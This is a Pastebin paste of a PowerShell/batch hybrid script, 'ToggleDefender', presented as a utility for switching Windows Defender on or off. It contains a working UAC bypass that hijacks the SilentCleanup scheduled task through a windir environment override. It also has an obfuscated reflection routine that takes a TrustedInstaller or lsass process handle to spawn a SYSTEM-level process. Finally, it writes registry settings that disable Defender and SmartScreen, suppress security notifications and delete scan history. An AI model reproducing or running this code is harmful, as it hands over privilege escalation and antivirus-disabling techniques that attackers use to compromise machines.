aveyo

ToggleDefender

Feb 12th, 2020 (edited)
4,892
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. @(echo off% <#%) &title Toggle Defender, AveYo 2020-11-16          || configure just auto-actions OFF; toggle icon on ltsb
  2. set "0=%~f0"&set 1=%*&powershell -nop -win 1 -c iex ([io.file]::ReadAllText($env:0)) &exit/b ||#>)[1]
  3. sp 'HKCU:\Volatile Environment' 'ToggleDefender' @'
  4. if ($(sc.exe qc windefend) -like '*TOGGLE*') {$TOGGLE=7;$KEEP=6;$A='Enable';$S='OFF'}else{$TOGGLE=6;$KEEP=7;$A='Disable';$S='ON'}
  5.  
  6. ## Comment to hide dialog prompt with Yes, No, Cancel (6,7,2)
  7. if ($env:1 -ne 6 -and $env:1 -ne 7) {
  8.   $choice=(new-object -ComObject Wscript.Shell).Popup($A + ' Windows Defender?', 0, 'Defender is: ' + $S, 51)
  9.   if ($choice -eq 2) {break} elseif ($choice -eq 6) {$env:1=$TOGGLE} else {$env:1=$KEEP}
  10. }
  11.  
  12. ## Without the dialog prompt above will toggle automatically
  13. if ($env:1 -ne 6 -and $env:1 -ne 7) { $env:1=$TOGGLE }
  14.  
  15. ## Comment to not relaunch systray icon
  16. start cmd -args '/d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"' -win 1
  17.  
  18. ## Comment to not hide per-user toggle notifications
  19. $notif='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance'
  20. ni $notif -ea 0|out-null; ri $notif.replace('Settings','Current') -Recurse -Force -ea 0
  21. sp $notif Enabled 0 -Type Dword -Force -ea 0; if ($TOGGLE -eq 7) {rp $notif Enabled -Force -ea 0}
  22.  
  23. ## 'UAC is not a security boundary' - OK, Microsoft. But why do you refuse to adress the lamest AlwaysNotify-compatible bpass?
  24. $ts=New-Object -ComObject 'Schedule.Service'; $ts.Connect(); $baffling=$ts.GetFolder('\Microsoft\Windows\DiskCleanup')
  25. $bpass=$baffling.GetTask('SilentCleanup'); $flaw=$bpass.Definition
  26.  
  27. ## Cascade elevation
  28. $u=0;$w=whoami /groups;if($w-like'*1-5-32-544*'){$u=1};if($w-like'*1-16-12288*'){$u=2};if($w-like'*1-16-16384*'){$u=3}
  29.  
  30. ## Reload from volatile registry as needed
  31. $r=[char]13; $nfo=[char]39+$r+' (\   /)'+$r+'( * . * )  A limited account protects you from UAC exploits'+$r+'    ```'+$r+[char]39
  32. $script='-nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo='+$nfo+';$env:1='+$env:1; $env:__COMPAT_LAYER='Installer'
  33. $script+=';iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}'; $cmd='powershell '+$script
  34.  
  35. ## 0: limited-user: must runas
  36. if ($u -eq 0) {
  37.   start powershell -args $script -verb runas -win 1; break
  38. }
  39.  
  40. ## 1: admin-user non-elevated: try windows built-in lame uac bpass before runas
  41. if ($u -eq 1) {
  42.   if ($flaw.Actions.Item(1).Path -inotlike '*windir*'){start powershell -args $script -verb runas -win 1; break}
  43.   sp hkcu:\environment windir $('powershell '+$script+' #')
  44.   $z=$bpass.RunEx($null,2,0,$null); $wait=0; while($bpass.State -gt 3 -and $wait -lt 17){sleep -m 100; $wait+=0.1}
  45.   if(gp hkcu:\environment windir -ea 0){rp hkcu:\environment windir -ea 0;start powershell -args $script -verb runas -win 1};break
  46. }
  47.  
  48. ## 2: admin-user elevated: get ti/system via runasti lean and mean snippet [$window hide:0x0E080600 show:0x0E080610]
  49. if ($u -eq 2) {
  50.   $A=[AppDomain]::CurrentDomain."Def`ineDynamicAssembly"(1,1)."Def`ineDynamicModule"(1);$D=@();0..5|%{$D+=$A."Def`ineType"('A'+$_,
  51.   1179913,[ValueType])} ;4,5|%{$D+=$D[$_]."Mak`eByRefType"()} ;$I=[Int32];$J="Int`Ptr";$P=$I.module.GetType("System.$J"); $F=@(0)
  52.   $F+=($P,$I,$P),($I,$I,$I,$I,$P,$D[1]),($I,$P,$P,$P,$I,$I,$I,$I,$I,$I,$I,$I,[Int16],[Int16],$P,$P,$P,$P),($D[3],$P),($P,$P,$I,$I)
  53.   $S=[String]; $9=$D[0]."Def`inePInvokeMethod"('CreateProcess',"kernel`32",8214,1,$I,@($S,$S,$I,$I,$I,$I,$I,$S,$D[6],$D[7]),1,4)
  54.   1..5|%!!|%{$9=$D[$k]."Def`ineField"('f'+$n++,$_,6)}};$T=@();0..5|%{$T+=$D[$_]."Cr`eateType"();$Z=[uintptr]::size
  55.   nv ('T'+$_)([Activator]::CreateInstance($T[$_]))}; $H=$I.module.GetType("System.Runtime.Interop`Services.Mar`shal");
  56.   $WP=$H."Get`Method"("Write$J",[type[]]($J,$J)); $HG=$H."Get`Method"("AllocH`Global",[type[]]'int32'); $v=$HG.invoke($null,$Z)
  57.   'TrustedInstaller','lsass'|%{if(!$pn){net1 start $_ 2>&1 >$null;$pn=[Diagnostics.Process]::GetProcessesByName($_)[0];}}
  58.   $WP.invoke($null,@($v,$pn.Handle)); $SZ=$H."Get`Method"("SizeOf",[type[]]'type'); $T1.f1=131072; $T1.f2=$Z; $T1.f3=$v; $T2.f1=1
  59.   $T2.f2=1;$T2.f3=1;$T2.f4=1;$T2.f6=$T1;$T3.f1=$SZ.invoke($null,$T[4]);$T4.f1=$T3;$T4.f2=$HG.invoke($null,$SZ.invoke($null,$T[2]))
  60.   $H."Get`Method"("StructureTo`Ptr",[type[]]($D[2],$J,'boolean')).invoke($null,@(($T2-as $D[2]),$T4.f2,$false));$window=0x0E080600
  61.   $9=$T[0]."Get`Method"('CreateProcess').Invoke($null,@($null,$cmd,0,0,0,$window,0,$null,($T4-as $D[4]),($T5-as $D[5]))); break
  62. }
  63.  
  64. ## Create registry paths
  65. $wdp='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
  66. ' Security Center\Notifications','\UX Configuration','\MpEngine','\Spynet','\Real-Time Protection' |% {ni ($wdp+$_)-ea 0|out-null}
  67.  
  68. ## Toggle Defender
  69. if ($env:1 -eq 7) {
  70.   rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications -Force -ea 0
  71.   rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration' Notification_Suppress -Force -ea 0
  72.   rp 'HKLM:\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications -Force -ea 0
  73.   rp 'HKLM:\SOFTWARE\Microsoft\Windows Defender\UX Configuration' Notification_Suppress -Force -ea 0
  74.   rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System' EnableSmartScreen -Force -ea 0
  75.   rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware -Force -ea 0
  76.   rp 'HKLM:\SOFTWARE\Microsoft\Windows Defender' DisableAntiSpyware -Force -ea 0
  77.   sc.exe config windefend depend= RpcSs
  78.   net1 start windefend
  79.   kill -Force -Name MpCmdRun -ea 0
  80.   start ($env:ProgramFiles+'\Windows Defender\MpCmdRun.exe') -Arg '-EnableService' -win 1
  81. } else {
  82.   sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications 1 -Type Dword -ea 0
  83.   sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration' Notification_Suppress 1 -Type Dword -Force -ea 0
  84.   sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications 1 -Type Dword -ea 0
  85.   sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender\UX Configuration' Notification_Suppress 1 -Type Dword -Force -ea 0
  86.   sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System' EnableSmartScreen 0 -Type Dword -Force -ea 0
  87.   sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware 1 -Type Dword -Force -ea 0
  88.   sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender' DisableAntiSpyware 1 -Type Dword -Force -ea 0
  89.   net1 stop windefend
  90.   sc.exe config windefend depend= RpcSs-TOGGLE
  91.   kill -Name MpCmdRun -Force -ea 0
  92.   start ($env:ProgramFiles+'\Windows Defender\MpCmdRun.exe') -Arg '-DisableService' -win 1
  93.   del ($env:ProgramData+'\Microsoft\Windows Defender\Scans\mpenginedb.db') -Force -ea 0           ## Commented = keep scan history
  94.   del ($env:ProgramData+'\Microsoft\Windows Defender\Scans\History\Service') -Recurse -Force -ea 0
  95. }
  96.  
  97. ## PERSONAL CONFIGURATION TWEAK - COMMENT OR UNCOMMENT #rp ENTRIES TO TWEAK OR REVERT
  98. sp $wdp DisableRoutinelyTakingAction 1 -Type Dword -Force -ea 0                       ## Auto Actions OFF
  99. # rp $wdp DisableRoutinelyTakingAction -Force -ea 0                                   ## Auto Actions ON [default]
  100. sp $wdp PUAProtection 1 -Type Dword -Force -ea 0                                      ## Potential Unwanted Apps ON
  101. rp $wdp PUAProtection -Force -ea 0                                                    ## Potential Unwanted Apps OFF [default]
  102. sp ($wdp+'\MpEngine') MpCloudBlockLevel 2 -Type Dword -Force -ea 0                    ## Cloud blocking level HIGH
  103. rp ($wdp+'\MpEngine') MpCloudBlockLevel -Force -ea 0                                  ## Cloud blocking level LOW [default]
  104. sp ($wdp+'\Spynet') SpyNetReporting 2 -Type Dword -Force -ea 0                        ## Cloud protection ADVANCED
  105. rp ($wdp+'\Spynet') SpyNetReporting -Force -ea 0                                      ## Cloud protection BASIC [default]
  106. sp ($wdp+'\Spynet') SubmitSamplesConsent 0 -Type Dword -Force -ea 0                   ## Sample Submission ALWAYS-PROMPT
  107. rp ($wdp+'\Spynet') SubmitSamplesConsent -Force -ea 0                                 ## Sample Submission AUTOMATIC [default]
  108. sp ($wdp+'\Real-Time Protection') RealtimeScanDirection 1 -Type Dword -Force -ea 0    ## Scan incoming file only
  109. rp ($wdp+'\Real-Time Protection') RealtimeScanDirection -Force -ea 0                  ## Scan incoming and outgoing file [default]
  110.  
  111. ## Uncomment to close windows built-in lame uac bpass and/or reset uac
  112. # if ($flaw.Actions.Item(1).Path -ilike '*windir*') {
  113. #   $flaw.Actions.Item(1).Path=$env:systemroot+'\system32\cleanmgr.exe'               ## %windir%\system32\cleanmgr.exe [default]
  114. #   $baffling.RegisterTaskDefinition($bpass.Name,$flaw,20,$null,$null,$null)          ## UAC silent bpass mitigation
  115. #   $uac='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
  116. #   sp $uac EnableLUA 1 -Type Dword -Force -ea 0                                      ## UAC enable
  117. #   sp $uac ConsentPromptBehaviorAdmin 2 -Type Dword -Force -ea 0                     ## UAC always notify - bpassable otherwise
  118. #   sp $uac PromptOnSecureDesktop 1 -Type Dword -Force -ea 0                          ## UAC secure - prevent automation
  119. # }
  120.  
  121. '@ -Force -ea 0; iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)
  122. #-_-# hybrid script, can be pasted directly into powershell console
  123.  
RAW Paste Data